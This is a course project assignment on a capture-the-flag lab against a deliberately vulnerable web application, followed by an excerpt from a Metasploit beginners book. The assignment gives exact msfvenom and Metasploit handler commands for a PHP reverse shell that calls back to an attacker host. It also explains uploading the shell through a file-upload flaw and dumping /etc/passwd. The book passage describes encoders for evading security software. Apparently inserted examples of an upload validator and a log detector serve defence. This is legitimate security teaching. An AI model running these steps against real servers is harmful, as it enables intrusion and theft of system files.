Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary.

Please follow the project Action Item and Provide 

 Take a screenshot of the terminal window showing the content of the passwd file. 

Weekly Learning and Reflection 

In two to three paragraphs (i.e., sentences, not bullet lists) using APA style citations if needed, summarize, and interact with the content covered in this project. Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also what you have learned through the session. You can ask questions for the things you're confused about. Questions asked here will be summarized and answered anonymously in the next class.

Project-1: Getting a Reverse Shell

In this project, you are assigned the task of stealing /etc/passwd file of OWASP BWA computer in a CTF (Capture-the-Flag) event. You discovered that OWASP BWA has a vulnerable web application. First, you crack the password of the web application, and then you log in to the web application and try to exploit it in a way that allows you to steal the passwd file of the server on which this web app is running.

Reminder

Please skim the specified chapters of the book (Metasploit 5.0 for beginners 2nd ed.) before starting the project.

Computers

Notes:

1) You will perform all of your actions from Kali Linux.

2) You cannot copy and paste between your computer and the computers in the Netlab environment; however, it will be both quicker and more reliable if you use your keyboard's Tab key after typing the first 2-3 letters of each command or command parameter in Metasploit.

3) Use CTRL – to shrink the fonts on Kali Linux terminal windows; alternatively you can click on the View menu and then the Shrink Font menu item.

Steps of Hacking

1. Optional: Crack the password of the admin user of the web application at http://192.168.2.15/dvwa/login.php. (This is the same lab you performed in Lab-7, Section-3.)

2. Create a PHP backdoor (reverse PHP shell) by using msfvenom (A tool from Metasploit Framework)

3. Upload the PHP backdoor to the web application. (Being able to upload a PHP file is yet another vulnerability, and an easy one to exploit. You will practice this local file upload vulnerability in detail in Lab-8, Section-2.)

4. Prepare a handler on Kali Linux that will wait for the connection requests from the exploited web application and later on send commands to the same web application.

5. Call the reverse shell you uploaded (Open the PHP file on the browser on Kali)

6. Send a command to the vulnerable web application to fetch the /etc/passwd file of the OWASP BWA computer (192.168.2.15).
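One way the upload in step 3 could have been refused, shown as an added example (it is not part of the original assignment or of the web application's code): a server-side check that accepts only image content and chooses the stored file name itself. The function names, the size limit and the list of allowed types are assumptions.

```python
import os
import uuid

# Leading bytes of the only content types this (assumed) upload feature accepts.
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit


class UploadRejected(Exception):
    """Raised when an upload fails validation."""


def sniff_extension(data: bytes):
    """Return the extension implied by the file's leading bytes, or None."""
    for magic, ext in SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def safe_upload_name(client_name: str, data: bytes) -> str:
    """Validate an upload and return the server-chosen storage name.

    The client-supplied name is never used for storage. Its last extension
    only has to agree with the sniffed type, so 'x.php' and 'x.png.php'
    are both refused even when the body is a valid image.
    """
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    ext = sniff_extension(data)
    if ext is None:
        raise UploadRejected("content is not an allowed image type")
    claimed = os.path.splitext(client_name)[1].lower()
    if claimed == ".jpeg":
        claimed = ".jpg"
    if claimed != ext:
        raise UploadRejected(f"extension {claimed!r} does not match content")
    # Random name with an extension derived from the content, not the client.
    return uuid.uuid4().hex + ext


if __name__ == "__main__":
    # Constructed sample inputs: a minimal PNG header and a PHP-looking body.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print(safe_upload_name("photo.png", png))
    try:
        safe_upload_name("reverseshell.php", b"<?php /* constructed */ ?>")
    except UploadRejected as err:
        print("rejected:", err)
```

Content checks alone do not stop a script hidden inside a valid image, so the stored files should also live in a directory the web server serves as static content and never passes to the PHP interpreter.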

The List of Actions/Commands per Step

1. Crack the password of the admin user of the web application

This part is optional. If you want to practice it once more, see Lab-7, Section-3. This part has been included in the project for the sake of logical completeness. If this were a real hacking case, the hacker would have to perform this step before the upcoming steps.

2. Create a PHP backdoor (reverse shell)

| Command | Notes |
| --- | --- |
| msfvenom -p php/reverse_php LHOST=192.168.2.10 LPORT=443 -f raw > reverseshell.php | File created: reverseshell.php |

3. Upload PHP backdoor to the DVWA

Find the link to upload a file from the left menu after logging into the web app using the cracked password. Refer to the Lab-8, Section-2 instructions to see the solution.

4. Prepare a handler on Kali Linux

A PHP reverse shell on its own does not allow you to connect to the remote server (OWASP BWA). There should be a corresponding handler that will respond to the connection request from the PHP reverse shell and send commands to the reverse shell. A handler can be regarded as a command and control server. The reverse shell is like the RC car, but it is only the car. The handler is the remote-control unit. Neither of them will work alone. In this analogy, the frequency of the RC unit should be compatible with the frequency of the receiver in the car. Similarly, the parameters of the handler you are creating should be in full harmony with the parameters of the PHP shell.

| Commands | Notes |
| --- | --- |
| msfconsole | This command opens the Metasploit Framework. |
| search handler | This is an informational command. Just try to find the handler among the search results. |
| use exploit/multi/handler | Using multi/handler, which is a stub that handles exploits launched outside of the framework. (In this case, it is the reverseshell.php file.) |
| set payload php/reverse_php | Using the reverse_php payload for this handler. Check the command you typed in step-2 (PHP backdoor creation). Remember the frequency analogy. |
| show options | This is yet another informational command. It shows the options of the payload. |
| set lhost 192.168.2.10 | Option-1. Check the command you typed in step-2 (PHP backdoor creation). Remember the frequency analogy. |
| set lport 443 | Option-2. Check the command you typed in step-2 (PHP backdoor creation). Remember the frequency analogy. |
| exploit | Run the handler. |

5. Call the reverse shell

After uploading the PHP file (in Step-3), the web application returned the path where the reverse shell has been uploaded. Copy that path, append it to the URL in a meaningful way, and hit Enter.

6. Send a command to the vulnerable web application and fetch the /etc/passwd file

Switch to the terminal window where you ran the handler with the exploit command. If you uploaded the PHP file in Step-3 and then called the file in Step-5 accurately, the PHP script has already opened a connection to the handler and is waiting for the handler's commands. You should also see a message from the handler similar to "Command shell session 1 opened (192.168.2.10:443 -> 192.168.2.15:54585 at YYYY-MM-DD HH:MM:SS +Timezone)".

If you see the message above, send the command to dump the /etc/passwd file to the terminal window; there is a standard command in Linux called cat that writes the content of files to the screen.

Take a screenshot of the terminal window showing the content of the passwd file.
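How the upload-then-call sequence of steps 3 and 5 looks from the defender's side, as an added example that is not part of the original assignment: a small detector that scans web server access logs for script files requested from the upload directory. The upload path /app/uploads/, the host 192.168.2.77 and all log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumed layout: files uploaded through the application are served from here.
UPLOAD_PREFIX = "/app/uploads/"
# Script extensions a PHP-enabled server may execute, including 'x.php.jpg'.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed access-log lines (Common Log Format), not captured from a real host.
SAMPLE_LOG = """\
192.168.2.10 - - [08/Nov/2022:20:01:11 +0000] "GET /app/login.php HTTP/1.1" 200 1523
192.168.2.10 - - [08/Nov/2022:20:03:40 +0000] "POST /app/upload.php HTTP/1.1" 200 4410
192.168.2.77 - - [08/Nov/2022:20:03:55 +0000] "GET /app/uploads/cat.jpg HTTP/1.1" 200 88213
192.168.2.10 - - [08/Nov/2022:20:04:02 +0000] "GET /app/uploads/reverseshell.php HTTP/1.1" 200 0
192.168.2.77 - - [08/Nov/2022:20:05:19 +0000] "GET /app/uploads/%6eote.PHP?x=1 HTTP/1.1" 404 210
"""


def parse(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE.match(line)
    if not m:
        return None
    # Drop the query string and undo percent-encoding before matching paths.
    path = unquote(urlsplit(m["target"]).path)
    return {"ip": m["ip"], "ts": m["ts"], "method": m["method"],
            "path": path, "status": int(m["status"])}


def find_upload_executions(log_text):
    """Flag requests for script files under the upload directory.

    Severity is 'high' when the server answered 2xx (the file exists and was
    probably run) and the same client sent a POST earlier in the log, which
    is the upload-then-call sequence of steps 3 and 5. Otherwise it is 'low'.
    """
    posted = set()
    alerts = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        if rec["method"] == "POST":
            posted.add(rec["ip"])
        name = rec["path"].rsplit("/", 1)[-1]
        if rec["path"].startswith(UPLOAD_PREFIX) and SCRIPT_EXT.search(name):
            served = 200 <= rec["status"] < 300
            severity = "high" if served and rec["ip"] in posted else "low"
            alerts.append((severity, rec["ip"], rec["ts"], rec["path"]))
    return alerts


if __name__ == "__main__":
    for alert in find_upload_executions(SAMPLE_LOG):
        print(alert)
```

The handler message in step 6 shows the web server (192.168.2.15) connecting from an ephemeral port to 192.168.2.10:443, so the server opened that connection itself. An egress rule that denies connections initiated by the web server is a complementary control to this log check.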



11/8/22, 8:03 PM Chapter 3: Metasploit Components and Environment Configuration | Metasploit 5.0 for Beginners – Second Edition

https://learning.oreilly.com/library/view/metasploit-5-0-for/9781838982669/B15240_03_Final_ASB_ePub.xhtml#_idParaDest-43 1/51

Chapter 3: Metasploit Components and Environment Configuration

For any tool that we use to perform a particular task, it's always helpful to know that tool inside out. A detailed understanding of the tool enables us to use it appropriately, making it perform to the fullest of its capability. Now that you have learned some of the absolute basics of the Metasploit Framework and how to install it, in this chapter you will learn how the Metasploit Framework is structured and the various components of the Metasploit ecosystem.

The following topics will be covered in this chapter:

Anatomy and structure of Metasploit

Metasploit components: auxiliaries, exploits, encoders, payloads, and post

Getting started with msfconsole and common commands

Variables in Metasploit

Updating the Metasploit Framework

Technical requirements

The following software is required:

Kali Linux

Metasploit Framework

Anatomy and structure of Metasploit

The simplest method to learn the structure of Metasploit Framework is to browse and explore through its application directory. In Kali Linux, the Metasploit Framework can be located at /usr/share/metasploit-framework, as shown in the following screenshot:

Figure 3.1 – Metasploit Framework directory

At a broad level, the Metasploit Framework structure is as shown in the following screenshot:

Figure 3.2 – Metasploit Framework Structure

We'll be using tools/utilities from each of these categories as we progress through the book.

In the next section, we'll have a brief overview of all the Metasploit components.

Metasploit components and environment configuration

The Metasploit Framework has various component categories based on their role in the penetration testing phases. Each of the component categories has various modules and plugins that we can use in the exploitation process.

The following sections will provide a detailed understanding of what each component category is responsible for.

Auxiliaries

You have learned so far that Metasploit is a complete penetration testing framework and not just a tool. When we call it a framework, it means that it consists of many useful tools and utilities. Auxiliary modules in the Metasploit Framework are nothing but small pieces of code that are meant to perform a specific task (in the scope of our penetration testing life cycle). For example, you might need to perform a simple task of verifying whether a certificate of a particular server has expired or not, or you might want to scan your subnet and check whether any of the FTP servers allow anonymous access.

Such tasks can be very easily accomplished using the auxiliary modules present in the Metasploit Framework. There are more than 1,000 auxiliary modules spread across 19 categories in the Metasploit Framework.

The following table shows various categories of auxiliary modules present in the Metasploit Framework:


Don't get overwhelmed with the number of auxiliary modules present in the Metasploit Framework. You may not need to know each and every module individually. You just need to search for the right module in the required context and use it accordingly. We will now see how to use an auxiliary module.

During the course of this book, we will use many different auxiliary modules as and when required; however, let's get started with a simple example:


1. Open up a terminal window and start Metasploit using the msfconsole command.

2. Select the portscan/tcp auxiliary module to perform a port scan against a target system.

3. Using the show command, list all the parameters that need to be configured in order to run this auxiliary module.

4. Using the set RHOSTS command, set the IP address of our target system.

5. Using the set PORTS command, select the port range you want to scan on your target system.

6. Using the run command, execute the auxiliary module with the parameters configured earlier.

You can see the use of all the previously mentioned commands in the following screenshot:

Figure 3.3 – Auxiliary TCP Port Scanner

Next, we will be covering payloads.

Payloads

To understand what a payload does, let's consider a real-world example. A military unit of a certain country develops a new missile that can travel a range of 500 km at very high speed. Now, the missile is of no use unless it's armed with the right kind of ammunition. Now, the military unit decided to load high explosive material within the missile so that when the missile hits the target, the explosive material within the missile explodes and causes the required damage to the enemy. In this case, the high explosive material within the missile is the payload. The payload can be changed based on the severity of damage that is to be caused by the missile.

Similarly, payloads in the Metasploit Framework let us decide what action is to be performed on the target system once the exploit is successful.

Singles: These are sometimes also referred to as inline or non-staged payloads. Payloads in this category are a completely self-contained unit of the exploit and require shellcode, which means they have everything that is required to exploit the vulnerability on the target. The disadvantage of such payloads is their size. Since they contain the complete exploit and shellcode, they can be quite bulky at times, rendering them useless in scenarios with size restrictions.

Stagers: There are certain scenarios where the size of the payload matters a lot. A payload with even a single byte extra may not function well on the target system. The stager's payload comes in handy in such a situation. The stager's payload simply sets up a connection between the attacking system and the target system. It doesn't have the shellcode necessary to exploit the vulnerability on the target system. Being very small in size, it fits in well in many scenarios.

Stages: Once the stager payload has set up a connection between the attacking system and the target system, the stages payloads are then downloaded on the target system. They contain the required shellcode to exploit the vulnerability on the target system.

The following screenshot shows a sample payload that can be used to obtain a reverse TCP shell from a compromised Windows system:

Figure 3.4 – Reverse TCP Payload

You will be learning how to use various payloads along with exploits, in the upcoming chapters.

Exploits

Exploits are a crucial part of the Metasploit Framework. An exploit is nothing but the actual piece of code that gives the required access to the target system. There are more than 2,500 exploits spread across more than 19 categories based on platform supported by exploit. Now, you might be thinking that, out of so many available exploits, which is the one that needs to be used? The decision to use a particular exploit against a target can be made only after extensive enumeration and vulnerability assessment of our target. (Refer to the section penetration testing life cycle in Chapter 1, Introduction to Metasploit and Supporting Tools).


Proper enumeration and a vulnerability assessment of the target will give us the following information based on which we can choose the correct exploit:

Operating system of the target system (including exact version and architecture)

Open ports on the target system (Transmission Control Protocol (TCP) and User Datagram Protocol (UDP))

Services along with versions running on the target system

Probability of a particular service being vulnerable

The following table shows the various categories of exploits available in the Metasploit Framework:


In the upcoming chapters, we'll see how to use an exploit against a vulnerable target. Now, we will move ahead to understand the use of encoders during exploitation.

Encoders

In any real-world penetration testing scenario, it's quite possible that our attempt to attack the target system would be detected by some kind of security software present on the target system. This may jeopardize all our efforts to gain access to the remote system. This is exactly when encoders come to the rescue. The job of the encoders is to obfuscate our exploit and payload in such a way that, in the target system, it goes unnoticed by all of the security systems.

The following table shows the various encoder categories available in the Metasploit Framework:

We'll be looking at encoders in more detail in the upcoming chapters. We'll now move ahead to understand use of NOPs
